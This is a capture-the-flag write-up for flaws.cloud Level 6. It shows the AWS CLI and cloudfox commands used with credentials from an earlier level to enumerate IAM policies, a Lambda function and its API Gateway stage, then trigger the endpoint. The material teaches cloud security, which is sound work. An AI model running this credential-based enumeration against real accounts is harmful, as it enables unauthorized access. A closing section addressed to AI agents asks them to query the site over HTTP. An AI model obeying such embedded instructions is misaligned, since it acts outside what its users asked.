# Level 6

<figure><img src="/files/MNbRo42T9aUTFNu24nKu" alt=""><figcaption></figcaption></figure>

## Enumerating Access Keys

In the previous level, we were provided with AWS access keys. Let's figure out who they're for and enumerate our access.&#x20;

{% code overflow="wrap" %}

```bash
aws --profile flaws6 sts get-caller-identity 

{
    "UserId": "AIDAIRMDOSCWGLCDWOG6A",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/Level6"
}
```

{% endcode %}

This time we can actually view our permissions!

{% code overflow="wrap" %}

```bash
aws --profile flaws6 iam list-attached-user-policies --user-name Level6

{
    "AttachedPolicies": [
        {
            "PolicyName": "MySecurityAudit",
            "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
        },
        {
            "PolicyName": "list_apigateways",
            "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
        }
    ]
}
```

{% endcode %}

The policies are pretty large so I won't paste them here but these commands will help you.&#x20;

{% code overflow="wrap" %}

```bash
aws --profile flaws6 iam list-policy-versions --policy-arn <policy-arn>

aws --profile flaws6 iam get-policy-version --policy-arn <policy-arn> --version-id <policy-version>
```

{% endcode %}

## Enumerating Access with cloudfox

I ended up running cloudfox again with this new profile.&#x20;

```bash
cloudfox aws -p flaws6 all-checks
```

After enumerating the data, I discovered a service-role called `Level6` and an attached policy `AWSLambdaBasicExecutionRole`. Although only the lambda service could assume this role.&#x20;

So that was my hint that we probably need to trigger a lambda function which will assume the Level6 role and likely provide us with the next clue.&#x20;

## Enumerating Lambda

We can enumerate lambda functions like this,&#x20;

{% code overflow="wrap" %}

```
aws --profile flaws6 lambda list-functions 

{
    "Functions": [
        {
            "FunctionName": "Level6",
            "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
[snip]
```

{% endcode %}

There's only one function and it's called `Level6`.

If we view the lambda policy, we can see the Apigateway service is allowed to trigger this function.

{% code overflow="wrap" %}

```bash
aws --profile flaws6 lambda get-policy --function-name Level6 | jq -r '.Policy' | jq

{
  "Version": "2012-10-17",
  "Id": "default",
  "Statement": [
    {
      "Sid": "904610a93f593b76ad66ed6ed82c0a8b",
      "Effect": "Allow",
      "Principal": {
        "Service": "apigateway.amazonaws.com"
      },
      "Action": "lambda:InvokeFunction",
      "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
      "Condition": {
        "ArnLike": {
          "AWS:SourceArn": "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"
[snip]
```

{% endcode %}

So, we need to put together the API that we need to call. The format is like this,&#x20;

{% code overflow="wrap" %}

```bash
https://<rest-api-id>.execute-api.<region>.amazonaws.com/<api-stage-name>/<function-name>
```

{% endcode %}

With the enumeration thus far, we have all the details except the stage name but we can discover that like so,&#x20;

```bash
aws --profile flaws6 apigateway get-stages --rest-api-id "s33ppypa75"               

{
    "item": [
        {
            "deploymentId": "8gppiv",
            "stageName": "Prod",
            "cacheClusterEnabled": false,
[snip]
```

## Triggering the API

With all the required information discovered, we can trigger the API.&#x20;

{% code overflow="wrap" %}

```bash
curl https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

"Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"
```

{% endcode %}

Navigating to the website, we discover the end of the challenge!&#x20;

<figure><img src="/files/jAhdLLXv1n0xxuFOAlvF" alt=""><figcaption></figcaption></figure>

## Wrap-Up

In Level 6, we enumerated our access with access keys discovered from the previous level. After much enumeration, this led to discovering an API that, once triggered, provided the end of the challenge.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/flaws.cloud/level-6.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.